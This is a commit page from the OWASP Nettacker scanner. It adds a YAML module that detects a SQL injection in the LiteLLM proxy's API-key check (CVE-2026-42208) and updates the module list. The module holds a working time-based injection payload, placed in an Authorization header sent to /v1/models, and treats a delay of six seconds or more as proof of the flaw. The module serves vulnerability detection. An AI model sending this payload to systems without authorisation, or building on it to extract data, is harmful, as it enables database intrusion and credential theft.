Skip to content

Commit 1891cec

Browse files
committed
feat: add litellm cve-2026-42208 detection module
1 parent 5a821a6 commit 1891cec

2 files changed

Lines changed: 58 additions & 0 deletions

File tree

docs/Modules.md

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -212,6 +212,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
212212
- '**ivanti_ics_cve_2023_46805_vuln**' – check the target for Ivanti ICS CVE-2023-46805 vulnerability
213213
- '**joomla_cve_2023_23752_vuln**' – check the target for Joomla CVE-2023-23752 information disclosure
214214
- '**justwriting_cve_2021_41878_vuln**' – check the target for JustWriting CVE-2021-41878
215+
- '**litellm_cve_2026_42208_vuln**' - check the target for LiteLLM CVE-2026-42208 SQL injection vulnerability
215216
- '**log4j_cve_2021_44228_vuln**' – check the target for Log4Shell CVE-2021-44228 vulnerability
216217
- '**maxsite_cms_cve_2021_35265_vuln**' – check the target for MaxSite CMS CVE-2021-35265
217218
- '**memos_cve_2025_22952_ssrf_vuln**' – check vulnerable Memos markdown metadata endpoint CVE-2025-22952
Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
info:
2+
name: litellm_cve_2026_42208_vuln
3+
author: OWASP Nettacker Team
4+
severity: 9.8
5+
description: >
6+
LiteLLM is a proxy server (AI Gateway) to call LLM APIs in OpenAI (or native) format.
7+
From version 1.81.16 to before version 1.83.7, a database query used during proxy API key
8+
checks mixed the caller-supplied key value into the query text instead of passing it as a separate parameter.
9+
An unauthenticated attacker could send a specially crafted Authorization header to any LLM API route
10+
(for example GET /v1/models) and reach this query through the proxy's error-handling path.
11+
An attacker could read data from the proxy's database and may be able to modify it, leading to unauthorised
12+
access to the proxy and the credentials it manages. This issue has been patched in version 1.83.7.
13+
reference:
14+
- https://nvd.nist.gov/vuln/detail/CVE-2026-42208
15+
- https://bishopfox.com/blog/cve-2026-42208-pre-authentication-sql-injection-in-litellm-proxy
16+
- https://www.sysdig.com/blog/cve-2026-42208-targeted-sql-injection-against-litellms-authentication-path-discovered-36-hours-following-vulnerability-disclosure
17+
profiles:
18+
- vuln
19+
- http
20+
- critical_severity
21+
- cve
22+
- cve2026
23+
- sqli
24+
- litellm
25+
- cisa_kev
26+
27+
payloads:
28+
- library: http
29+
steps:
30+
- method: get
31+
timeout: 15
32+
headers:
33+
User-Agent: "{user_agent}"
34+
Authorization: "Bearer ' OR (SELECT pg_sleep(6)) IS NULL --"
35+
ssl: false
36+
allow_redirects: false
37+
url:
38+
nettacker_fuzzer:
39+
input_format: "{{schema}}://{target}:{{ports}}/v1/models"
40+
prefix: ""
41+
suffix: ""
42+
interceptors:
43+
data:
44+
schema:
45+
- "http"
46+
- "https"
47+
ports:
48+
- 4000
49+
- 80
50+
- 443
51+
response:
52+
condition_type: and
53+
conditions:
54+
status_code:
55+
regex: "401"
56+
reverse: false
57+
responsetime: ">= 6"

0 commit comments

Comments
 (0)